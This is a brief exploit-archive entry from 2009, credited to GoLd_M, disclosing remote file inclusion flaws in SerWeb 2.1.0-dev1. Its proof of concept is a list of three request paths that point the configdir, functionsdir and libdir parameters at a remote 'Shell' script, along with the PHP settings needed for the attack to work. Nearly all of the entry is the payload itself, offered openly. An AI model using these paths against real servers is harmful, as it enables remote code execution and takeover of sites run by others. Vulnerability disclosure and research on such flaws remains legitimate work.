[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SerWeb <= 2.1.0-dev1 2009-07-02 Multiple RFI Vulnerabilities
# Published : 2009-07-27
# Author : GoLd_M
# Previous Title : Magician Blog <= 1.0 (Auth Bypass) SQL injection Vulnerability
# Next Title : Million-Dollar Pixel Ads Platinum (SQL/XSS) Multiple Vulnerabilities


SerWeb <= 2.1.0-dev1 2009-07-02 Multiple Remote File Inclusion Vulnerabilities
D.Script : http://ftp.iptel.org/pub/serweb/daily-snapshots/
POC:
/load_lang.php?_SERWEB[configdir]=Shell
/main_prepend.php?_SERWEB[functionsdir]=Shell
/load_phplib.php?_PHPLIB[libdir]=Shell
Us = php_flag magic_quotes_gpc Off / php_flag magic_quotes_runtime Off

# www.Syue.com [2009-07-27]